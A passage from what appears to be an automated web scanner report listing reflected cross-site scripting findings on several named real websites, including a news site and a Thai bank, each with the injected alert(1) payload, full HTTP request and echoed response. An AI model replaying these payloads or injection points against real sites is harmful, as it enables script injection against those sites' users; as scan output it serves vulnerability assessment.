6.203. http://www.ndtv.com/video/player/news/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah/209797 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /video/player/news/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah/209797

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2cfd"><img%20src%3da%20onerror%3dalert(1)>490f72d082b was submitted in the REST URL parameter 3. This input was echoed as f2cfd"><img src=a onerror=alert(1)>490f72d082b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/player/newsf2cfd"><img%20src%3da%20onerror%3dalert(1)>490f72d082b/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah/209797 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=598
Expires: Sun, 04 Sep 2011 04:53:42 GMT
Date: Sun, 04 Sep 2011 04:43:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139091

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<link rel="canonical" href="http://www.ndtv.com/video/player/newsf2cfd"><img src=a onerror=alert(1)>490f72d082b/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah/209797" />
...[SNIP]...

6.204. http://www.ndtv.com/video/player/news/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah/209797 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /video/player/news/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah/209797

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22e72"><img%20src%3da%20onerror%3dalert(1)>99a847a3e87 was submitted in the REST URL parameter 4. This input was echoed as 22e72"><img src=a onerror=alert(1)>99a847a3e87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/player/news/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah22e72"><img%20src%3da%20onerror%3dalert(1)>99a847a3e87/209797 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 04:53:55 GMT
Date: Sun, 04 Sep 2011 04:43:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139091

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<link rel="canonical" href="http://www.ndtv.com/video/player/news/no-regrets-for-tweet-on-afzal-guru-says-omar-abdullah22e72"><img src=a onerror=alert(1)>99a847a3e87/209797" />
...[SNIP]...

6.205. http://www.ndtv.com/video/player/the-big-fight/life-or-death-should-terrorists-be-shown-mercy/209810 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /video/player/the-big-fight/life-or-death-should-terrorists-be-shown-mercy/209810

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57140"><img%20src%3da%20onerror%3dalert(1)>b6358c302bc was submitted in the REST URL parameter 3. This input was echoed as 57140"><img src=a onerror=alert(1)>b6358c302bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/player/the-big-fight57140"><img%20src%3da%20onerror%3dalert(1)>b6358c302bc/life-or-death-should-terrorists-be-shown-mercy/209810 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 04:53:51 GMT
Date: Sun, 04 Sep 2011 04:43:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137784

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<link rel="canonical" href="http://www.ndtv.com/video/player/the-big-fight57140"><img src=a onerror=alert(1)>b6358c302bc/life-or-death-should-terrorists-be-shown-mercy/209810" />
...[SNIP]...

6.206. http://www.ndtv.com/video/player/the-big-fight/life-or-death-should-terrorists-be-shown-mercy/209810 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /video/player/the-big-fight/life-or-death-should-terrorists-be-shown-mercy/209810

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4debc"><img%20src%3da%20onerror%3dalert(1)>3392a56ed95 was submitted in the REST URL parameter 4. This input was echoed as 4debc"><img src=a onerror=alert(1)>3392a56ed95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/player/the-big-fight/life-or-death-should-terrorists-be-shown-mercy4debc"><img%20src%3da%20onerror%3dalert(1)>3392a56ed95/209810 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=548
Expires: Sun, 04 Sep 2011 04:53:10 GMT
Date: Sun, 04 Sep 2011 04:44:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137784

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<link rel="canonical" href="http://www.ndtv.com/video/player/the-big-fight/life-or-death-should-terrorists-be-shown-mercy4debc"><img src=a onerror=alert(1)>3392a56ed95/209810" />
...[SNIP]...

6.207. http://www.ndtv.com/video/player/the-car-bike-show/first-look-at-hondas-small-car-for-india-brio/209809 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /video/player/the-car-bike-show/first-look-at-hondas-small-car-for-india-brio/209809

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19fff"><img%20src%3da%20onerror%3dalert(1)>3d04ea4eb4b was submitted in the REST URL parameter 3. This input was echoed as 19fff"><img src=a onerror=alert(1)>3d04ea4eb4b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/player/the-car-bike-show19fff"><img%20src%3da%20onerror%3dalert(1)>3d04ea4eb4b/first-look-at-hondas-small-car-for-india-brio/209809 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=569
Expires: Sun, 04 Sep 2011 04:53:22 GMT
Date: Sun, 04 Sep 2011 04:43:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137727

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<link rel="canonical" href="http://www.ndtv.com/video/player/the-car-bike-show19fff"><img src=a onerror=alert(1)>3d04ea4eb4b/first-look-at-hondas-small-car-for-india-brio/209809" />
...[SNIP]...

6.208. http://www.ndtv.com/video/player/the-car-bike-show/first-look-at-hondas-small-car-for-india-brio/209809 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ndtv.com
Path:   /video/player/the-car-bike-show/first-look-at-hondas-small-car-for-india-brio/209809

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2aad7"><img%20src%3da%20onerror%3dalert(1)>be763847df2 was submitted in the REST URL parameter 4. This input was echoed as 2aad7"><img src=a onerror=alert(1)>be763847df2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /video/player/the-car-bike-show/first-look-at-hondas-small-car-for-india-brio2aad7"><img%20src%3da%20onerror%3dalert(1)>be763847df2/209809 HTTP/1.1
Host: www.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Pragma: public
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Cache-Control: max-age=600
Expires: Sun, 04 Sep 2011 04:54:04 GMT
Date: Sun, 04 Sep 2011 04:44:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137727

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.facebook.c
...[SNIP]...
<link rel="canonical" href="http://www.ndtv.com/video/player/the-car-bike-show/first-look-at-hondas-small-car-for-india-brio2aad7"><img src=a onerror=alert(1)>be763847df2/209809" />
...[SNIP]...

6.209. http://www.networkadvertising.org/managing/optout_results.asp [yahoo_token parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.networkadvertising.org
Path:   /managing/optout_results.asp

Issue detail

The value of the yahoo_token request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8bd2d'><script>alert(1)</script>212594a988f was submitted in the yahoo_token parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Content-Length: 873
Cache-Control: max-age=0
Origin: http://www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=FCNKKPJCMDIJJDNIDDFMIMFA; __utma=1.1392774634.1315133979.1315133979.1315133979.1; __utmb=1; __utmc=1; __utmz=1.1315133979.1.1.utmccn=(referral)|utmcsr=tidaltv.com|utmcct=/PrivacyDashboard.aspx|utmcmd=referral

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...
optThis=63&optThis=64&optThis=65&optThis=66&optThis=67&optThis=68&optThis=69&optThis=70&optThis=71&optThis=72&optThis=73&optThis=74&optThis=75&AOLOptThis=1&TribalOptThis=1&yahoo_token=QTNjYXUuZUVQOUE-8bd2d'><script>alert(1)</script>212594a988f

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 11:40:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 03 Sep 2011 11:40:52 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...
<img src='http://info.yahoo.com/nai/optout.html?token=QTNjYXUuZUVQOUE-8bd2d'><script>alert(1)</script>212594a988f' width=15 height=15>
...[SNIP]...

6.210. http://www.scb.co.th/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6401d--><script>alert(1)</script>f84aab8a50e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico6401d--><script>alert(1)</script>f84aab8a50e HTTP/1.1
Host: www.scb.co.th
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=1ctsnmk0q15mlinku02lk986e6

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 03:32:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Fri, 04 Mar 2011 03:32:04 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 703
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/favicon.ico6401d--><script>alert(1)</script>f84aab8a50e -->
...[SNIP]...

6.211. http://www.scb.co.th/scb_api/api_a_deposit.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /scb_api/api_a_deposit.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e1612--><script>alert(1)</script>542336de806 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /scb_apie1612--><script>alert(1)</script>542336de806/api_a_deposit.jsp HTTP/1.1
Host: www.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 04:44:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Fri, 04 Mar 2011 04:44:41 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 717
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/scb_apie1612--><script>alert(1)</script>542336de806/api_a_deposit.jsp -->
...[SNIP]...

6.212. http://www.scb.co.th/scb_api/img/api/t1new/bttn_calc.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /scb_api/img/api/t1new/bttn_calc.gif

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload effab--><script>alert(1)</script>c21afb84370 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /scb_apieffab--><script>alert(1)</script>c21afb84370/img/api/t1new/bttn_calc.gif HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/scb_api/scbapi.jsp?key=MjAxMTAxMTgxNzQ4MTA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0CCDB11AD34E86A30F4D251C83D2B95B

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 02:26:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Fri, 04 Mar 2011 02:26:07 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 727
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/scb_apieffab--><script>alert(1)</script>c21afb84370/img/api/t1new/bttn_calc.gif -->
...[SNIP]...

6.213. http://www.scb.co.th/scb_api/img/api/t1new/bttn_reset.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /scb_api/img/api/t1new/bttn_reset.gif

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload dc45e--><script>alert(1)</script>ce14265521d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /scb_apidc45e--><script>alert(1)</script>ce14265521d/img/api/t1new/bttn_reset.gif HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.scb.co.th/scb_api/scbapi.jsp?key=MjAxMTAxMTgxNzQ4MTA=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0CCDB11AD34E86A30F4D251C83D2B95B

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 02:26:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Fri, 04 Mar 2011 02:26:08 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 728
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/scb_apidc45e--><script>alert(1)</script>ce14265521d/img/api/t1new/bttn_reset.gif -->
...[SNIP]...

6.214. http://www.scb.co.th/scb_api/scbapi.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scb.co.th
Path:   /scb_api/scbapi.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 79d3b--><script>alert(1)</script>a13cede1428 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /scb_api79d3b--><script>alert(1)</script>a13cede1428/scbapi.jsp?key=MjAxMTAxMTgxNzQ4MTA= HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 02:25:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Fri, 04 Mar 2011 02:25:58 GMT
Cache-Control: public
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 735
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<title>SCB - 404 File not found</title>
<header>
<style>
body { text-align: center;}
h1 { font-size: 50px; }
body { font: 20px Constantia, 'Hoefler Text', "Adobe Caslon Pro", B
...[SNIP]...
<!-- PageID failed:/scb_api79d3b--><script>alert(1)</script>a13cede1428/scbapi.jsp?key=MjAxMTAxMTgxNzQ4MTA= -->
...[SNIP]...

6.215. http://www9.effectivemeasure.net/v4/em_js [ns parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_js

Issue detail

The value of the ns request parameter is copied into the HTML document as plain text between tags. The payload 86ec2<script>alert(1)</script>9bd0a086ee7 was submitted in the ns parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v4/em_js?flag=0&v=&vt=&hl=&sv=0&pv=&pn=&p=aHR0cDovL3d3dy5uYXRpb25tdWx0aW1lZGlhLmNvbS8%3D&r=aHR0cDovL3d3dy5nb29nbGUuY29tL3NlYXJjaD9zb3VyY2VpZD1jaHJvbWUmaWU9VVRGLTgmcT1iYW5na29rK3RoYWlsYW5kK25ld3M%3D&f=1&ns=_em86ec2<script>alert(1)</script>9bd0a086ee7&rnd=0.828509088139981&u=cat2_id%3D541.552057%26&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
Referer: http://www.nationmultimedia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-cache, must-revalidate
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: hl=1; expires=Tue, 04-Oct-2011 02:30:18 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: vt=e2c2a445a979498d33b9b9e202024e62e18088e413-981323754e62e2ba; expires=Wed, 29-Aug-2012 02:30:18 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: v=ae5e6c91ad4ba53932850d7277324e62e18088e4f8-084548474e62e2ba135_458; expires=Sun, 04-Sep-2011 03:00:18 GMT; path=/; domain=.effectivemeasure.net
Content-type: text/javascript
Connection: close
Content-Length: 421
Date: Sun, 04 Sep 2011 02:30:18 GMT
Server: C10

_em86ec2<script>alert(1)</script>9bd0a086ee7._domain="nationmultimedia.com";_em86ec2<script>alert(1)</script>9bd0a086ee7.setCkHl();_em86ec2<script>alert(1)</script>9bd0a086ee7.setCkVt("e2c2a445a979498
...[SNIP]...

6.216. http://member.bangkokpost.com/login.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://member.bangkokpost.com
Path:   /login.php

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 977f2"><script>alert(1)</script>6d51c152fef was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /login.php HTTP/1.1
Host: member.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=977f2"><script>alert(1)</script>6d51c152fef

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:29:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22138

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkok Post -
...[SNIP]...
<input type="hidden" id="xType" name="xRef" value="http://www.google.com/search?hl=en&q=977f2"><script>alert(1)</script>6d51c152fef">
...[SNIP]...

6.217. http://pixel.adsafeprotected.com/jspix [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7ed9"-alert(1)-"1f751c807da was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=11479&campId=4726 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a7ed9"-alert(1)-"1f751c807da
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=162A44A87D8CC29E81C6C3DE5F28210A; Path=/
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 02:39:49 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://www.google.com/search?hl=en&q=a7ed9"-alert(1)-"1f751c807da",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=11479&campId=4726",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000"
...[SNIP]...

6.218. http://www.addthis.com/bookmark.php [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee2d5%2522%253balert%25281%2529%252f%252f78792465b09 was submitted in the Referer HTTP header. This input was echoed as ee2d5";alert(1)//78792465b09 in the application's response.

